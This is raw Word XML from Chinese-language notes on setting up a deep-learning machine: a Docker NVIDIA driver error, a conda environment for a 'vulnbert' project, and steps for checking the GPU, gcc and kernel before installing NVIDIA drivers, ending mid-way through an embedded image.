    <w:p w14:paraId="45D5DF25" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DE7086" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRPr="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A53BE6">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A53BE6">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A53BE6">
        <w:t>Cannot start service dl-env: could not select device driver "nvidia" with capabilities: [[gpu]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488F959A" w14:textId="77777777" w:rsidR="00A53BE6" w:rsidRDefault="00A53BE6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>这个错误是由于未安装</w:t>
      </w:r>
      <w:r>
        <w:t>nvidia-container-toolkit</w:t>
      </w:r>
      <w:r>
        <w:t>或者安装完成后未重启</w:t>
      </w:r>
      <w:r>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:t>导致的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E88AFDF" w14:textId="77777777" w:rsidR="00A31C83" w:rsidRPr="00A53BE6" w:rsidRDefault="00A31C83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FCDDB6" w14:textId="77777777" w:rsidR="000818EE" w:rsidRPr="000818EE" w:rsidRDefault="000818EE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="791" w:name="_Toc159780212"/>
      <w:r w:rsidRPr="000818EE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Conda</w:t>
      </w:r>
      <w:bookmarkEnd w:id="791"/>
    </w:p>
    <w:p w14:paraId="49CCD812" w14:textId="77777777" w:rsidR="00A31C83" w:rsidRDefault="00A31C83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E7FEA70" w14:textId="77777777" w:rsidR="000818EE" w:rsidRPr="000818EE" w:rsidRDefault="000818EE" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000818EE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Conda bert 环境，仅供参考：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C518BB9" w14:textId="77777777" w:rsidR="000818EE" w:rsidRPr="000818EE" w:rsidRDefault="000818EE" w:rsidP="009222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0818EE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>conda create -n vulnbert python=3.9 pytorch==1.12.1 torchvision==0.13.1 torchaudio==0.12.1 cudatoolkit==11.3.1 numpy torchtext  pandas==2.0.0 scikit-learn==1.2.2 transformers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A2B85" w14:textId="77777777" w:rsidR="000818EE" w:rsidRPr="000818EE" w:rsidRDefault="000818EE" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1255A03E" w14:textId="77777777" w:rsidR="00A31C83" w:rsidRPr="000818EE" w:rsidRDefault="00A31C83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344C1E53" w14:textId="77777777" w:rsidR="00A31C83" w:rsidRDefault="00A31C83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C5F915" w14:textId="77777777" w:rsidR="00A31C83" w:rsidRDefault="00A31C83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F42B14C" w14:textId="7F250C32" w:rsidR="00DE6804" w:rsidRDefault="00DE6804" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="792" w:name="_Toc159780213"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cuda</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>torch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cudnn</w:t>
      </w:r>
      <w:bookmarkEnd w:id="792"/>
    </w:p>
    <w:p w14:paraId="4B51D725" w14:textId="6888FC8D" w:rsidR="0067564D" w:rsidRDefault="0067564D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6703FDF1" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F31EBC8" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="793" w:name="_Toc159780214"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nvidia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>驱动</w:t>
      </w:r>
      <w:bookmarkEnd w:id="793"/>
    </w:p>
    <w:p w14:paraId="3A27165F" w14:textId="77777777" w:rsidR="00D07FCF" w:rsidRDefault="00D07FCF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68FAFD28" w14:textId="71A88E78" w:rsidR="00D07FCF" w:rsidRDefault="00D07FCF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D07FCF">
        <w:t>https://blog.csdn.net/Perfect886/article/details/119109380</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF529D" w14:textId="77777777" w:rsidR="00D07FCF" w:rsidRPr="00D07FCF" w:rsidRDefault="00D07FCF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592F1A57" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先看显卡：</w:t>
      </w:r>
      <w:r w:rsidRPr="003A7417">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>lspci | grep -i nvidia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED3712C" w14:textId="35B3CE10" w:rsidR="00D07FCF" w:rsidRPr="00D07FCF" w:rsidRDefault="00D07FCF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>默认会使用的开源组织的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nou</w:t>
      </w:r>
      <w:r w:rsidRPr="00D07FCF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>veau</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>驱动：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D07FCF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>lsmod| grep -i nouveau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F126EC4" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00F40C44" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40C44">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>09:00.0 VGA compatible controller: NVIDIA Corporation TU106 [</w:t>
      </w:r>
      <w:r w:rsidRPr="003A7417">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>GeForce RTX 2070</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40C44">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>] (rev a1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01305C61" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00F40C44" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40C44">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>09:00.1 Audio device: NVIDIA Corporation TU106 High Definition Audio Controller (rev a1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37549C6D" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00F40C44" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F40C44">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>09:00.2 USB controller: NVIDIA Corporation TU106 USB 3.1 Host Controller (rev a1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4401DB5D" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F40C44">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>09:00.3 Serial bus controller: NVIDIA Corporation TU106 USB Type-C UCSI Controller (rev a1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164954F5" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="164CEA23" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者另一个命令查看显卡型号：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0179C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>lshw -c video</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBEFDDC" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00D43FF3" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43FF3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[sudo] password for syj:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1D9CC9" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00D43FF3" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43FF3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  *-display</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7414D03D" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00D43FF3" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43FF3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">       description: VGA compatible controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D85B2DD" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00D43FF3" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43FF3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">       product:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A7417">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> TU106 [GeForce RTX 2070]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2BA81E" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00D43FF3" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43FF3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">       vendor: NVIDIA Corporation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDD6CF4" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00D43FF3" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43FF3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">       physical id: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA98F67" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00D43FF3" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43FF3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">       bus info: pci@0000:09:00.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EF3630" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00D43FF3" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43FF3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">       version: a1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FEAC20" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00D43FF3" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43FF3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">       width: 64 bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721E158C" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00D43FF3" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43FF3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">       clock: 33MHz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072D9878" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00D43FF3" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43FF3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">       capabilities: pm msi pciexpress vga_controller bus_master cap_list rom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3EE9C3" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00D43FF3" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43FF3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">       configuration: driver=nouveau latency=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379AEA8E" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D43FF3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">       resources: irq:80 memory:f5000000-f5ffffff memory:e0000000-efffffff memory:f0000000-f1ffffff ioport:e000(size=128) memory:c0000-dffff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D252838" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2584D5FF" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00707809">
        <w:t>GeForce RTX 2070</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74124F75" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D7F21B4" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否安装：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA3E7B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>gcc --version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113CED4E" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00FA02A6" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA02A6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>gcc (Ubuntu 11.3.0-1ubuntu1~22.04) 11.3.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69688700" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00FA02A6" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA02A6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Copyright (C) 2021 Free Software Foundation, Inc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0FF7A5" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRPr="00FA02A6" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA02A6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>This is free software; see the source for copying conditions.  There is NO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019C5D52" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA02A6">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B4C73D" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="404C4EB2" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装的版本：</w:t>
      </w:r>
      <w:r w:rsidRPr="00355C37">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>gcc (Ubuntu 11.3.0-1ubuntu1~22.04) 11.3.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A73D84F" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593E19C7" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00006866">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查内核版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="008927ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="008927ED">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>name -r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6FC148" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008927ED">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5.15.0-58-generic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6056C6C3" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C141E59" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装显卡驱动：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADD31AC" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00034E27">
        <w:t>https://blog.csdn.net/qiancaobaicheng/article/details/95096354</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C75859" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3494FF09" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问官网，然后下载驱动：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5308D8A8" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00705371">
        <w:t>https://www.nvidia.com/Download/index.aspx?lang=en-us</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156C9474" w14:textId="77777777" w:rsidR="00E233EB" w:rsidRDefault="00E233EB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E0153C7" wp14:editId="33F7A8F3">
            <wp:extent cx="4169286" cy="1836674"/>
            <wp:effectExtent l="0" t="0" r="317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4169649" cy="1836834"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
